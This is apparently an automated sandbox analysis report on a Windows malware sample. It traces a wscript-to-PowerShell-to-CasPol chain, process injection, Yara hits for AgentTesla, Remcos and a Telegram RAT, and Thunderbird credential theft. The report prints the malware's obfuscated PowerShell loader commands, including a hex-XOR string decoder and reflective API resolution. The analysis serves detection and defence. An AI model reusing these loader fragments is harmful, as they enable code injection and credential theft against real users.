Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$damspils = """refgrukonnacsktdoikloutnhe grhshtpubmi mi{g ud ho pr hvpflarurnoavamso(st[desbotorrmoiannbogph]di`$hihstsbl)ro;pa ni vn ra sa`$inbvoyuntalesisbe sp=af unnbregrwkr-byocabomjcyeuncbytor prbglyfotprest[be]av fa(fo`$alhdesst.milquerinpegbathahge te/un ev2me)ta;sm op fo st chfmookurun(sc`$haidr=di0pr;is ly`$haipo sn-ovlkitco dy`$flhspspe.gylskeoknbrgcatsahal;ko sp`$deitr+da=sk2ak)la{ma sp wh ko gu va st ba pt`$prbudysttauebesur[hy`$odist/kf2ar]re ka=de ku[abcfootonpavtoeudrcotfu]je:bo:sptstoskbglygrtpreur(su`$uihdesno.casprucobovspotwerhyilintrgcu(st`$maima,le di2my)in,pa pa1az6no)ju;co ba rn`$gabopytitstebosdi[au`$eliad/as2ma]pa ve=tr sh(ci`$spbaaytetoxebosin[ra`$maiom/ba2am]bo do-tibdixglomorpa en2fr0ba1om)he;au vg re mr as}mi mi[suskktturspifanmagov]en[grsinyhyscltcaestmin.sttpoeudxuntko.reeafnthcunotrdariunnregta]be:ka:ovaslstrcpaiexibr.digsaehatmisoutalrspitansugbi(me`$elbinyettinemassu)ci;by}mi`$inrhaegrcovagilsycteioptrhrriahitdieme0pi=lihomtexbov sn'ho9thasnbvi0vabaaarabcidplacocgyavo4opein7weakodpeaex5opafr5cu'bi;ge`$emrafebycdiaemluncheiaptrirexahetstebe1lb=guhdatgebsk le'di8rg4lyapr0inaviaspbrebboaco6sibslakoafi6scabrfmiblidsiemo7be9laeunast0biako7wrfcaaunfstbhoech7ra9chcpaabe7skbadapaatr8huakefskadockn8sk7maapr8robcrdfoape0meblafscajucno8te4boarecspbdiddeaun1biati6tuawedhebilari'im;ga`$horisemiccaachlpocfoitrtberdeafltfoexx2ma=ruhmetovbno pi'ru8lyeraaobcmybandun9in9anbidbbaahy6wiaspaun8pa8joabidflasvdfabdabciabichabjaaprbanafo'ju;sa`$mtrthehichyaunlcycseidetnorsnaebtteedy3ge=urhmatphbbu ex'si9adabebna0olbmiaskbbodbramucunaru4hoech7be9sybfobuscopaun7fabundspaop0haaan4kiarecsresm7ga8ro0doagl7tibfodglasicyobsubdeajo6flbai9af9maakiaspcsabfjbgabfrfbnasw0ovaweacuatectoblaaouefo7sa8se1inati8spaec7deafodsaaop5foaalcgi9cybfiareckladrffe'ko;be`$tormaeprcnoainlrecetimatinrwiakotaleex4ga=fohtitbabwe un'ovbtrahebindilbpybfaaev0koabe7amasteun'fo;co`$skrseevacobabrlincryidetgrrwhachtfoera5ba=cchsptanbpr au'in8vgefnapacypbmodom8kl4raamu6deacodhubhicsnahy5loagecud8th1trafl8inaen7taaundbuael5afakacre'un;af`$gardeebocmyamelmackvioptmirheatrtpaesa6pl=hehomtkibul ea'ku9svbub9lidge9neasubfe9foanaclaainaheafy0foakh8caatr5un8to7flaen8koahe4doabicdiebl5hieoi9ha8po1maafl0alataddiacicaf8gibspbca0ra9buaduaae0udacaesjetr5goeha9op9ma9stbexcwoastbkrarn5beafl0amaaraaf'uk;jo`$terbaerecnaaholdrcjeiomtimrouanotsoeko7re=suhxytrubta tr'na9libfobscchuade7aabgrdjuaca0foagi4anarecgleyo5maeka9or8mi4deain8moasj7euath8fuafoeimamecunabedgi'ty;do`$terflevacinameluocpuiovtwirleakntmnean8st=tihpatpabst st'tn9libchanoclyajoflyaas5diafacviadmabobcadopalvcgaahidpr8hadvaapocovapo5taanoccraprescaci8mebapdnoakacly'st;un`$smrfiesicseaseldicpaivatrarteapotreedr9ov=mehdotsibst ca'ta8os0glano7ro8ch4peatrcreaop4beast6aabaabilbal0en8st4hoafe6yearadlsbexcunaun5prapocde'fo;ro`$stdnoegomfgasugcynkiereteviamzpaalmbblludepl0co=pahaltagbki ma'ba8dr4nobsy0sa8todhuafrcteat Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Bichloride.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0751D164 CreateNamedPipeW, 10_2_0751D164

Stealing of Sensitive Information
barindex
Yara detected Telegram RAT
Source: Yara match File source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected AgentTesla
Source: Yara match File source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
